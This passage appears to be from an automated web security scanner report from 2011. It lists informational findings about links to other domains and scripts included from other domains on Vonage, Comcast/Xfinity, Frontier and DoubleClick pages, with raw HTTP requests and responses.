Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</span>
                   <a href="http://www.vonage.ca" title="Vonage Canada VoIP Internet Phone Service">Canada</a>
...[SNIP]...
<li><a href="http://twitter.com/vonage_voice">Get short, timely answers from Vonage_Voice on Twitter</a>
...[SNIP]...
<li><a href="http://www.vonagemobile.com/support/help_center">Get Vonage Mobile Facebook support</a>
...[SNIP]...
</span>
<a href="http://www.twitter.com/vonage" target="_blank">Twitter</a>
...[SNIP]...
</span>
           <a href="http://www.facebook.com/vonage" target="_blank">Facebook</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://vonage.122.2o7.net/b/ss/vonagedev/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

15.125. http://www.xfinity.com/js-api/compressed/xpbar.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xfinity.com
Path:   /js-api/compressed/xpbar.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom HTTP/1.1
Host: www.xfinity.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://xfinity.comcast.net/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 06 Sep 2011 12:22:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://xfinity.comcast.net/js-api/compressed/xpbar.js?id=xpbar&amp;highlight=comcastcom">here</a>
...[SNIP]...

15.126. http://www.xfinity.com/js-api/compressed/xpbar.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xfinity.com
Path:   /js-api/compressed/xpbar.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /js-api/compressed/xpbar.js?id=xbardiv&highlight=comcastcom&version=2 HTTP/1.1
Host: www.xfinity.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://xfinity.comcast.net/js-api/compressed/xpbar.js?id=xbardiv&highlight=comcastcom&version=2
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 06 Sep 2011 12:24:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://xfinity.comcast.net/js-api/compressed/xpbar.js?id=xbardiv&amp;highlight=comcastcom&amp;version=2">here</a>
...[SNIP]...

15.127. http://xfinity.comcast.net/xpbar/1/default/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfinity.comcast.net
Path:   /xpbar/1/default/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /xpbar/1/default/?referrer=http%3A%2F%2Fsitesearch.comcast.com%2F&highlight=comcastcom HTTP/1.1
Host: xfinity.comcast.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 12:19:54 GMT
Cache-Control: max-age=300
Expires: Tue, 06 Sep 2011 12:24:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 14439
Date: Tue, 06 Sep 2011 12:22:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<li class="first xfinity"><a class="xfinity" href="http://www.xfinity.com?intcmp=xpbar" rel="default" title="XFINITY - TV, Voice and Internet"><span class="">
...[SNIP]...

15.128. http://xfinity.comcast.net/xpbar/2/default/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfinity.comcast.net
Path:   /xpbar/2/default/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /xpbar/2/default/?referrer=http%3A%2F%2Fwww.comcast.com%2F&highlight=comcastcom HTTP/1.1
Host: xfinity.comcast.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 12:15:49 GMT
Cache-Control: max-age=300
Expires: Tue, 06 Sep 2011 12:20:49 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 14275
Date: Tue, 06 Sep 2011 12:24:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<li class="first xfinity"><a class="xfinity" href="http://www.xfinity.com?intcmp=xpbar" rel="default" title="XFINITY - TV, Voice and Internet"><span class="">
...[SNIP]...

15.129. http://yp.frontierpages.com/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yp.frontierpages.com
Path:   /results.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=&city=Dallas&state=TX&zip= HTTP/1.1
Host: yp.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://www.frontierpages.com/region.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cznpages%3D%2526pid%253Dfrontierpages.com/region.asp%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BreturnBusinessSearch%252528%252529%25253B%25257D%2526oidt%253D2%2526ot%253DIMG

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<link href="
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/ftr.frontierpages.com/;tile=1;sz=300x250;ord=123456789?" target="_blank" >
<img src="http://ad.doubleclick.net/ad/ftr.frontierpages.com/;tile=1;sz=300x250;ord=123456789?" border="0" alt="" />
</a>
...[SNIP]...
<noscript>
<a href="http://www.omniture.com" title="Web Analytics">
<img alt="" border="0" height="1" src="http://cznquapages.112.2O7.net/b/ss/cznquapages/1/H.19.4--NS/0"
width="1" />

</a>
...[SNIP]...

16. Cross-domain script include
There are 72 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


16.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2434.Yahoo/B5625836.2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N2434.Yahoo/B5625836.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?3,eAGlUE1zokAQ.TN72jLMJzNDqDmMiMSEUTEkxr2kQBDDhxCkYsivXxLdVO7bl.f6Vfd71Y2IbVIUp-kuiayEMhabNiKYpDGniG1H0LZtQpDFMMcjDd3DeHfceMFEvzaF-qob.nYbnKnKPnF2bpbiEyfOFPfOWVFTrt8v9D9h3EcnffEY8r5ylYpdjyzz2fjb3Hsw5x8B1eE899cBXUx0p8NpqR046Nm7H27pnzApdPhYzbGmm9P3phztu665BiAr6zgqjahNjD7a17WxrStwP.MkMo8Rs5qaAC254IIQA1EqGBR0IMMLLQQNhE3TGhowkVFZVv2uBfeSMMgIxpRd-yvXARu5UTeLBXCflhIRZA7fJoIDX7YPTqasXKRvT41aNXlYGqc8KLTeJzwqzMrNj0q9rDkYyzRfW8tuGC3FFbi92GAkOLEswkxwJw-v5fNj6Baw9TP2nJ7uAgi9ACjJsKCMWGAlIfj969.Zu7Y-dC9pa1T9j7v.AitxnlY=,;ord=1315312189? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7409
Date: Tue, 06 Sep 2011 12:29:50 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Aug 15 11:16:49 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.11

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.11;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130941610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313094? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6162
Date: Tue, 06 Sep 2011 12:44:58 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jun 20 19:41:41 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.12

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.12;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6171
Date: Tue, 06 Sep 2011 12:49:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jun 20 19:41:57 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.396

Issue detail

The response dynamically includes the following scripts from other domains:

http://s0.2mdn.net/879366/flashwrite_1_2.js
http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Request

GET /adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4225
Date: Tue, 06 Sep 2011 12:50:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
...[SNIP]...

16.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Issue detail

The response dynamically includes the following scripts from other domains:

http://s0.2mdn.net/879366/flashwrite_1_2.js
http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Request

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=2556211545 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4231
Date: Tue, 06 Sep 2011 12:50:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
...[SNIP]...

16.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3340.dedicatedmedia.com/B5641952.2

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3340.dedicatedmedia.com/B5641952.2;sz=300x250;pc=[TPAS_ID];click0=http://ib.adnxs.com/click?AAAAAAAACEAAAAAAAAAIQAAAAEA3CRVAAAAAAAAACEAAAAAAAAAIQHpNKG9SeSsU___________tFWZOAAAAAAeaCABVAgAAVQIAAAIAAACSQQcA-lUAAAEAAABVU0QAVVNEACwB-gByAwAABQ4AAgMCAQUAAAAAIxWhkwAAAAA./cnd=!qQQLJgi6uwcQkoMdGPqrASAE/referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D2%3Bdcopt%3Dist%3Bsz%3D300x250%3Bord%3D8383746361359954%3F/clickenc=http%3A%2F%2Foptimized-by.rubiconproject.com%2Ft%2F6348%2F9844%2F16043-15.3218925.3243961%3Furl%3D;ord=1315313133? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7753
Date: Tue, 06 Sep 2011 12:45:35 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 15:28:01 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

16.7. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

http://tags.mathtag.com/view/js/?strat=109185&cr=126412&supply=99&random=1315313146&rfr=http%3A%2F%2Fmaps%2Eyahoo%2Ecom%2Fdarla%5Ffc%3Fcb%3Dyahoo%2Eads%2Edarla%2E%5Floaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf%2D8%26rn%3D1315331124066%26em%3D%257b%2522site%2Dattribute%2522%253a%2522content%253dno%5Fexpandable%253bajax%5Fcert%5Fexpandable%2522%252c%2522ad&rfid=238934&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMty4jAQ%2EJmFwxZYL78IpdoSYAjY5mmHJRdKtgTEGNsxImT%2Efg3epLiuDjOtnurWtBDpxgJGkYhQx%2DYc7UyziwgmMjaEvZMt2O12kQEtQjpIh62X93DA5m44Yr1L%2DB6y%2D3HXwq0RY%2EsbGNe3uX3rg%2E4UOs93nrHLR7iqh302T%2E7pa%2DI%2Eax9Nvt659Wst11QynCfj3rfZwCE%2Dniavax9664U%2DG2yUHwxTv48O08SBXhDrr4E4%2DsHLaTqaHv1vIaOtg1LFEwD7NI94qvFSaH%2E4Ic%2D1OD%2DB1XhEkVHodqESBXxq2ZZNiIZ0XTcQvAHcQbbZ0ZBpdExCwICeeHEGK4ohxoRgHepP3tLpgw3dsOfZDDi%2E5xQRZBAMqynw6N6I0it2x24eFGxZJEGqXZPF1fMPwuJH4zSUC8bC0gM9%2DnY4fCzCfLTJ8jaY1DaVF9YR0aGBgUv94ww5BLprf9GZhfYEGmO72ANGTWwijC2wpBD8%2EPGV%2DbbrQ1rBy5Rvd%2EGvOKL1H3Bx1u6stk1zLqRoFveAzd1DwGZK01LGTZnRi9q17WaZ1bsRVO0GTbMpT7RhRQ2Mz29KtrlS5Vt0UbIiGoRXNc4zJTPVICLLt%2EKz4JngUSobJOIJ%2E9zGsl